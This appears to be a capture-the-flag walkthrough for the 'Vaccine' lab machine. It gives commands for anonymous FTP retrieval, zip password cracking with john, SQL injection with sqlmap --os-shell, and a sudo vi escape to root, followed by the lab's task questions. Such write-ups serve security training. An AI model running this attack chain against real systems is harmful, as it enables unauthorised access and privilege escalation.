$ vaccine.pwn()
Anonymous FTP yields a password-protected backup.zip. zip2john extracts a crackable hash — password reveals admin credentials for the web app. SQLmap with --os-shell gains a system shell as postgres. The postgres user can run vi as root via sudo, which drops into a root shell via vi's shell escape.
Techniques
Open Ports
Terminal Session
# FTP anonymous login
ftp 10.129.x.x
> Name: Anonymous
> get backup.zip
> exit

# Crack the zip password
zip2john backup.zip > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
# Password: 741852963

# Unzip → index.php contains: admin:qwerty789 (md5)
# Log in to web app as admin
# URL has ?car= parameter → test for SQL injection

# SQLmap with OS shell
sqlmap -u 'http://10.129.x.x/dashboard.php?search=1' \
  --cookie='PHPSESSID=...' --os-shell
# Shell as postgres

# Check sudo privileges
sudo -l
# postgres can run: /bin/vi /etc/postgresql/.../pg_hba.conf

# Privilege escalation via vi
sudo /bin/vi /etc/postgresql/*/pg_hba.conf
# In vi:
:!/bin/bash
# → Root shell!

[✓] Root shell obtained — flags captured!
Tasks (7)
Besides SSH and HTTP, what other service is hosted on this box?
This service can be configured to allow login with any password for a specific username. What is that username?
What is the name of the file downloaded over this service?
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
What is the password for the admin user on the website?
What option can be passed to sqlmap to try to get command execution via the SQL injection?
What program can the postgres user run as root using sudo?